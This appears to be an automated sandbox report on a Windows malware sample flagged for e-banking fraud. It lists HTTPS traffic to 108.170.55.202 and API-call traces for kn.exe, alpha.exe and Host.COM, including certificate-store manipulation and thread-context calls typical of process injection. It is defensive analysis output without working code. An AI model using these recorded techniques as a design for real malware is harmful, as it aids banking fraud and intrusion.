    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
    Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
    Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
    Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49746 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49759 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49772 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49783 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49794 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49806 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49819 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49832 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49845 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49858 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49874 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49886 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49899 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49910 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49923 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49936 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49948 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49959 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49972 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49985 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49998 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50011 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50021 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50032 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50044 version: TLS 1.2

    E-Banking Fraud

    barindex
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACE60BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,7_2_00007FF68ACE60BC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC929A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF68AC929A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF68ACBEA7C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF68ACC0F58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF68ACD0EF4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06EA8 NCryptImportKey,#360,7_2_00007FF68AD06EA8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACCE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF68ACCE1F8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68AD0A740
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC925E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF68AC925E8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF68AC6FC20
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF68AC5F9B8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68ACD342C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD093A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68AD093A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD098B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF68AD098B0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF68ACC184C
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71967898C NtQueryInformationToken,4_2_00007FF71967898C
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719663D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF719663D94
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719691538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF719691538
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196789E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF7196789E4
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719678114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF719678114
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71968BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF71968BCF0
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF7196788C0
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719677FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF719677FF8
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71967898C NtQueryInformationToken,6_2_00007FF71967898C
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719663D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,6_2_00007FF719663D94
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719691538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,6_2_00007FF719691538
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196789E4 NtQueryInformationToken,NtQueryInformationToken,6_2_00007FF7196789E4
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719678114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,6_2_00007FF719678114
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71968BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,6_2_00007FF71968BCF0
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,6_2_00007FF7196788C0
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719677FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,6_2_00007FF719677FF8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD2C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,7_2_00007FF68AD2C964
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB7D80 NtWriteVirtualMemory,11_2_02AB7D80
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ABDD6C RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,11_2_02ABDD6C
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ABDBAC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_02ABDBAC
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ABDC88 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,11_2_02ABDC88
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ABDC00 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_02ABDC00
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB8D6A GetThreadContext,SetThreadContext,NtResumeThread,11_2_02AB8D6A
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB8D6C GetThreadContext,SetThreadContext,NtResumeThread,11_2_02AB8D6C
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719665240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF719665240
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719674224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF719674224
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719670A6C4_2_00007FF719670A6C
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71966AA544_2_00007FF71966AA54
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196742244_2_00007FF719674224
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196755544_2_00007FF719675554
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196737D84_2_00007FF7196737D8
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71968EE884_2_00007FF71968EE88
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71966E6804_2_00007FF71966E680
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196676504_2_00007FF719667650
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71966D2504_2_00007FF71966D250
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719669E504_2_00007FF719669E50
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196652404_2_00007FF719665240
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71968AA304_2_00007FF71968AA30
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719664A304_2_00007FF719664A30
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196622204_2_00007FF719662220
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719687F004_2_00007FF719687F00
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719666EE44_2_00007FF719666EE4
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196915384_2_00007FF719691538
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719667D304_2_00007FF719667D30
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71966CE104_2_00007FF71966CE10
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719668DF84_2_00007FF719668DF8
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71968D9D04_2_00007FF71968D9D0
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196681D44_2_00007FF7196681D4
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196618844_2_00007FF719661884
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719662C484_2_00007FF719662C48
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196778544_2_00007FF719677854
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71968AC4C4_2_00007FF71968AC4C
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196685104_2_00007FF719668510
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71966B0D84_2_00007FF71966B0D8
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196718D44_2_00007FF7196718D4
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719663F904_2_00007FF719663F90
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719665B704_2_00007FF719665B70
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719669B504_2_00007FF719669B50
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71966372C4_2_00007FF71966372C
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7196634104_2_00007FF719663410
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF719666BE04_2_00007FF719666BE0
    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF71968AFBC4_2_00007FF71968AFBC
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719670A6C6_2_00007FF719670A6C
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71966AA546_2_00007FF71966AA54
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196742246_2_00007FF719674224
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196755546_2_00007FF719675554
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196737D86_2_00007FF7196737D8
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71968EE886_2_00007FF71968EE88
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71966E6806_2_00007FF71966E680
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196676506_2_00007FF719667650
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71966D2506_2_00007FF71966D250
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719669E506_2_00007FF719669E50
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196652406_2_00007FF719665240
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71968AA306_2_00007FF71968AA30
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719664A306_2_00007FF719664A30
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196622206_2_00007FF719662220
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719687F006_2_00007FF719687F00
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719666EE46_2_00007FF719666EE4
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196915386_2_00007FF719691538
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719667D306_2_00007FF719667D30
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71966CE106_2_00007FF71966CE10
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719668DF86_2_00007FF719668DF8
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71968D9D06_2_00007FF71968D9D0
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196681D46_2_00007FF7196681D4
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196618846_2_00007FF719661884
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF719662C486_2_00007FF719662C48
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196778546_2_00007FF719677854
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71968AC4C6_2_00007FF71968AC4C
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7196685106_2_00007FF719668510
    Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF71966B0D86_2_00007FF71966B0D8
